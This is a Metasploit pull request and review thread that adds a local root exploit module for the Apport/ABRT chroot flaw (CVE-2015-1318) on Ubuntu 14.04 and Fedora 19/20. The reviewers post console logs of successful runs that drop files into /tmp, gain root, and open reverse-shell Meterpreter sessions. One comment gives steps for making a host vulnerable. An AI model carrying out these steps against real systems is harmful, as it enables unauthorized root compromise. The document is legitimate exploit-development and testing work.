### PR TITLE
Add Apport /Abrt chroot Privilege Escalation exploit

### PR DESCRIPTION
**Pull request by bcoles**
Add Apport chroot Privilege Escalation exploit module.

        This module attempts to gain root privileges on Ubuntu by invoking
        the default coredump handler (Apport) inside a namespace ("container").

        Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are
        vulnerable (CVE-2015-1318), due to a feature which allows forwarding
        reports to a container's Apport, causing usr/share/apport/apport
        within the crashed task's directory to be executed. Apport does not
        not drop privileges, resulting in code execution as root.

        This module has been tested successfully on Apport 2.14.1
        on Ubuntu 14.04.1 LTS x86 and x86_64.

This module drops and executes Tavis' static compiled C exploit. The exploit could be compiled on the host, but would require both `gcc` and `libc`. The issue is also exploitable using a shell script or python, but requires `lxc` to be installed, which doesn't appear to be default.

Fun fact: Tavis' exploit also works for `abrt` on Fedora. This module will also work on Fedora if you comment out the `check` conditional in `exploit`.

## Verification

- [x] Start `msfconsole`
- [x] Get a session
- [x] `use exploit/linux/local/apport_chroot_priv_esc`
- [x] `set SESSION <ID>`
- [x] `run`
- [x] **Verify** you get a *root* session

## Example Output

```
msf > use exploit/linux/local/apport_chroot_priv_esc
msf exploit(linux/local/apport_chroot_priv_esc) > set session 1
session => 1
rmsf exploit(linux/local/apport_chroot_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Writing '/tmp/.drY6cJZ' (887316 bytes) ...
[*] Writing '/tmp/.LtJvrgjXq' (207 bytes) ...
[*] Launching exploit...
[+] Upgraded session to root privileges ('uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),1000(user)')
[*] Sending stage (857352 bytes) to 172.16.191.252
[*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.252:35552) at 2018-01-11 09:58:25 -0500
[+] Deleted /tmp/.drY6cJZ
[+] Deleted /tmp/.LtJvrgjXq

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : 172.16.191.252
OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

### CODE REVIEW

**Comment by bcoles** [comment]
Travis build failed due to `msftidy`.

```
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/linux/local/apport_chroot_priv_esc.rb - [ERROR] Please avoid unicode or non-printable characters in Author
modules/exploits/linux/local/apport_chroot_priv_esc.rb:32 - [ERROR] Unicode detected: " 'St\xC3\xA9phane Graber', # Independent discovery, PoC and patch\n"
```

This should be resolved by merging #9398 which removes the msftidy check for ASCII-only module and author names.

**Comment by jvoisin** [comment]
> Fun fact: Tavis' exploit also works for abrt on Fedora. This module will also work on Fedora if you comment out the check conditional in exploit.

It might be worth adapting the `check` conditional then, wouldn't it?

**Comment by bcoles** [comment]
@jvoisin  The bug in Fedora is very similar, but in different software. I figured a separate module would make more sense.

**Comment by h00die** [comment]
This actually checks 2 modules off my list which I had started many moons ago and never got around to finishing. Woohoo to non-ubuntu private escs!

**Comment by bcoles** [comment]
@jvoisin @h00die I've added Fedora support to this module rather than create a separate module.

```
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.191.244:4444 
[*] Writing '/tmp/.BbYzSNPRo' (64812 bytes) ...
[*] Writing '/tmp/.jPlQ4zH' (207 bytes) ...
[*] Launching exploit...
[+] Upgraded session to root privileges
[*] Sending stage (857352 bytes) to 172.16.191.137
[*] Meterpreter session 19 opened (172.16.191.244:4444 -> 172.16.191.137:56550) at 2018-01-14 03:06:05 -0500
[+] Deleted /tmp/.BbYzSNPRo
[+] Deleted /tmp/.jPlQ4zH

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

Apport is vulnerable due to not dropping privileges before chrooting.

Abrt is not vulnerable to the same bug.

As it turns out, between April and August 2014, the Fedora crash handler was configured to `chroot` `abrt`, causing it to be vulnerable in [almost exactly the same manner to Apport on Ubuntu](https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c10).

**Comment by h00die** [comment]
need to rename your documentation extension from .rb to .md

**Comment by h00die** [comment]
Failed for me on ubuntu 14.04.5 ubuntu 32bit desktop edition.
```
msf exploit(linux/local/apport_abrt_chroot_priv_esc) > sessions -i 1
[*] Starting interaction with 1...
uname -a
Linux ubuntu-desktop-14 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

^Z
Background session 1? [y/N]  y

msf exploit(linux/local/apport_abrt_chroot_priv_esc) > set verbose true
verbose => true
msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.2.117:4444 
[+] Linux kernel version 4.4.0 is vulnerable
[+] System is configured to use Apport for crash reporting
[+] Apport version 2.14.1 is vulnerable
[*] Writing '/tmp/.rQwVoqx' (64812 bytes) ...
[*] Max line length is 65537
[*] Writing 64812 bytes in 4 chunks of 55672 bytes (octal-encoded), using printf
[*] Next chunk is 52069 bytes
[*] Next chunk is 47886 bytes
[*] Next chunk is 43655 bytes
[*] Writing '/tmp/.aWbYpzcWwj' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[-] Exploit aborted due to failure: unknown: Failed to gain root privileges
[*] Exploit completed, but no session was created.
```

In the interactive console I see:
```
w00t: failed to create chroot directory: File exists
```

maybe a bad cleanup or some randomization is needed?

**Comment by h00die** [comment]
Ubuntu 14.04 server x64 worked fine
```
msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.2.117:4444 
[+] Linux kernel version 4.2.0 is vulnerable
[+] System is configured to use Apport for crash reporting
[+] Apport version 2.14.1 is vulnerable
[*] Writing '/tmp/.qdsVJ' (64812 bytes) ...
[*] Max line length is 65537
[*] Writing 64812 bytes in 4 chunks of 55672 bytes (octal-encoded), using printf
[*] Next chunk is 52069 bytes
[*] Next chunk is 47886 bytes
[*] Next chunk is 43655 bytes
[*] Writing '/tmp/.WouqPlve2y' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[+] Upgraded session to root privileges
uid=0(root) gid=1000(ubuntu) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(ubuntu)
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 192.168.2.156
[*] Meterpreter session 3 opened (192.168.2.117:4444 -> 192.168.2.156:32858) at 2018-01-31 10:46:34 -0500
[+] Deleted /tmp/.qdsVJ
[+] Deleted /tmp/.WouqPlve2y

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : Ubuntu14.04
OS           : Ubuntu 14.04 (Linux 4.2.0-27-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

```

**Comment by bcoles** [comment]
@h00die Renamed documentation.

Ubuntu 14.04.5 was released in August 2016 - about 18 months after the CVE. It's likely patched.

**Comment by h00die** [comment]
Must be backported, all the checks passed.  I wonder if we can figure out a way to tell the backport.


Fedora 20 that i have laying around was too old of a kernel. Once updated the kernel, it patched itself.  I can't "unpatch" until I get around selinux.  I'll look it over in the next few days and I'll see if i can get it configured to be vuln correctly

**Comment by bcoles** [comment]
For Fedora 20, disable SELinux, reboot, and modify `/proc/sys/kernel/core_pattern` :

```
|/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
```

For Fedora 19, I happened to have a VM lying around in the sweet spot of up-to-date kernel and vulnerable `core_pattern`.

**Comment by h00die** [comment]
Fedora 20 worked.
```
msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.2.1:4444 
[+] Linux kernel version 3.19.8 is vulnerable
[+] System is configured to chroot ABRT for crash reporting
[*] Writing '/tmp/.vaZSpyB' (64812 bytes) ...
[*] Max line length is 65537
[*] Writing 64812 bytes in 4 chunks of 55672 bytes (octal-encoded), using printf
[*] Next chunk is 52069 bytes
[*] Next chunk is 47886 bytes
[*] Next chunk is 43655 bytes
[*] Writing '/tmp/.ljXjlnkUK' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Launching exploit...
[+] Upgraded session to root privileges
uid=0(root) gid=1001(ubuntu) groups=0(root),1001(ubuntu)
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (857352 bytes) to 1.1.2.]3
[*] Meterpreter session 2 opened (1.1.2.1:4444 -> 1.1.2.3:32816) at 2018-02-01 20:03:53 -0500
[+] Deleted /tmp/.vaZSpyB
[+] Deleted /tmp/.ljXjlnkUK

meterpreter > getuid
Server username: uid=0, gid=1001, euid=0, egid=1001
meterpreter > sysinfo
Computer     : localhost.rageGroup
OS           : Fedora 20 (Linux 3.19.8-100.fc20.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

File: modules/exploits/linux/local/apport_abrt_chroot_priv_esc.md [hunk 1]
```diff
@@ -0,0 +1,69 @@
+## Description
+
+  This module attempts to gain root privileges on Ubuntu and Fedora systems by invoking the default coredump handler inside a namespace ("container").
+
+
```
Comment (h00die) [inline modules/exploits/linux/local/apport_abrt_chroot_priv_esc.md]: Can you add a h3 here about how to make a fedora 20 vulnerable?  The instructions in your last comment basically, i'd like to capture that in the docs for configuring the host correctly and not having to look back a year or two from now and try to remember

**Comment by h00die** [comment]
your docs need to be moved to the documentation folder as well

**Comment by h00die** [comment]
# Release Notes
This module adds a linux local priv esc against Ubuntu 14.04 and Fedora 19/20 through abrt and apport

**Comment by h00die** [comment]
Nice module, glad to get some more linux priv esc love!  Now on to the other bunches you've submitted!

**Pull request merged**